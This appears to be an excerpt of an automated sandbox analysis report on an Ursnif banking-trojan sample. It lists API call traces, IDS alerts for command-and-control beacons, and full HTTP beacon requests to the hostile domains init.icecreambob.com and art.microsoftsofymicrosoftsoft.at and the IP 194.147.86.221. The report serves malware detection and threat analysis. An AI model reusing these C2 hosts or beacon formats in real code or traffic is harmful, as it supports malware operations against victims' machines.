                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49779 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49779 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49780 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49780 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49781 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49781 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49862 -> 194.147.86.221:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49862 -> 194.147.86.221:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exeDomain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.86.221 80
                      Uses nslookup.exe to query domainsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machineShow sources
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: global trafficHTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                      Source: global trafficHTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                      Source: Joe Sandbox ViewASN Name: NETRACK-ASRU NETRACK-ASRU
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/
                      Source: rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm
                      Source: rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/l
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/lbK
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmpString found in binary or memory: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/spotify:
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
                      Source: global trafficHTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
